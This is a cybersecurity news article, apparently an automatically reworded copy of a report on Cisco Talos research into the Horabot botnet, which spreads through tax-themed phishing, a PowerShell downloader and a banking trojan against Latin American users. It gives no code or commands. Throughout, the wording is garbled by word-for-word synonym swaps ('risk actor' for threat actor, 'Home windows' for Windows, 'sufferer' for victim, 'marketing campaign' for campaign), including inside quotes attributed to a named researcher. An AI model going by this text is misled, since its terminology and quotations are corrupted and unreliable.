New Botnet Malware ‘Horabot’ Targets Spanish-Talking Customers in Latin America

Jun 02, 2023Ravie LakshmananBotnet / Malware

Botnet Malware

Spanish-speaking customers in Latin America have been on the receiving finish of a brand new botnet malware dubbed Horabot since a minimum of November 2020.

“Horabot permits the risk actor to manage the sufferer’s Outlook mailbox, exfiltrate contacts’ e mail addresses, and ship phishing emails with malicious HTML attachments to all addresses within the sufferer’s mailbox,” Cisco Talos researcher Chetan Raghuprasad said.

The botnet program additionally delivers a Home windows-based monetary trojan and a spam software to reap on-line banking credentials in addition to compromise Gmail, Outlook, and Yahoo! webmail accounts to blast spam emails.

The cybersecurity agency mentioned a majority of the infections are positioned in Mexico, with restricted victims recognized in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama. The risk actor behind the marketing campaign is believed to be in Brazil.

Focused customers of the continuing marketing campaign primarily span accounting, development and engineering, wholesale distribution, and funding verticals, though it is suspected that different sectors within the area might also be affected.

The assaults begin with phishing emails bearing tax-themed lures that entice the recipients into opening an HTML attachment, which, in flip, embeds a hyperlink containing a RAR archive.

Opening the contents of the file leads to the execution of a PowerShell downloader script that is answerable for retrieving a ZIP file containing the primary payloads from a distant server and rebooting the machine.

The system restart additionally serves as a launchpad for the banking trojan and the spam software, permitting the risk actor to steal information, log keystrokes, seize screenshots, and disseminate further phishing emails to the sufferer’s contacts.

“This marketing campaign entails a multi-stage assault chain that begins with a phishing e mail and results in payload supply via the execution of a PowerShell downloader script and sideloading to reliable executables,” Raghuprasad mentioned.

Botnet Malware

The banking trojan is a 32-bit Home windows DLL written within the Delphi programming language, and shares overlaps with different Brazilian malware households like Mekotio and Casbaneiro.

Horabot, for its half, is an Outlook phishing botnet program written in PowerShell that is able to sending phishing emails to all e mail addresses within the sufferer’s mailbox to propagate the an infection. It is also a deliberate try to attenuate the risk actor’s phishing infrastructure from being uncovered.


🔐 Mastering API Safety: Understanding Your True Assault Floor

Uncover the untapped vulnerabilities in your API ecosystem and take proactive steps in the direction of ironclad safety. Be part of our insightful webinar!

Join the Session

The disclosure arrives every week after SentinelOne attributed an unknown Brazilian risk actor to a long-running marketing campaign concentrating on greater than 30 Portuguese monetary establishments with information-stealing malware since 2021.

It additionally follows the invention of a brand new Android banking trojan dubbed PixBankBot that abuses the working system’s accessibility companies to conduct fraudulent cash transfers over the Brazilian PIX funds platform.

PixBankBot can be the most recent instance of malware that particularly focuses on Brazilian banks, that includes capabilities much like BrasDex, PixPirate, and GoatRAT which were noticed in current months.

If something, the developments signify one more iteration of a broader group of financially motivated hacking efforts emanating from Brazil, making it essential that customers stay vigilant to keep away from falling prey to such threats.

Discovered this text attention-grabbing? Comply with us on Twitter and LinkedIn to learn extra unique content material we put up.